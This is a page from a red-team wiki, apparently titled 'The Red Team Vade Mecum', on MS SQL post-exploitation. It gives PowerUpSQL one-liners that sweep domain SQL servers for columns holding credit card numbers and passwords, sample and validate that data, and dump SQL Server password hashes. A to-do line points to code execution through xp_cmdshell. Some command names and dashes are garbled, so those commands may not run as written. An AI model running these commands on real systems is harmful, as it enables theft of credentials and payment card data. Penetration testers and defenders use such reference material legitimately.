The Red Team Vade Mecum
Search…
The Red Team Vade Mecum
The Red Team Vade Mecum
Techniques
Defense Evasion
Privilege Escalation
Enumeration
Execution
Initial Access
Lateral Movement
Code Injection
Persistence
Infrastructure
SQL
MS SQL
Basics
Finding Sql Servers
Privilege Escalation
Post Exploitation
Other
Windows Internals
Powered By
GitBook
Post Exploitation
Finding Sensitive Info
Indicators of sensitive info are the size, utilization of transparent encryption, names etc.
For example, we can use this PowerUpSQL query to identify sensitive info based on names:
>> Get-SQLInstanceDomain | Get-SQLConnectionTest | GetSQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,money,password" -SampleSize 2 -ValidateCC -NoDefaults
Or with transparent encryption:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded – Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq "TRUE"} |
Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword "card, password" –SampleSize 2 –ValidateCC -NoDefaults
Extracting hashes
PowerUpSQL has a very useful function called GetSQLServerPasswordHash that automates the extracting hashes.
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\DATABASE -Migrate
Todo
Getting code execution via xpcmdshell and sp_OACreate
​
​
​
Previous
Privilege Escalation
Next - Other
Windows Internals
Last modified
1yr ago
Copy link
On this page
Finding Sensitive Info
Extracting hashes
Todo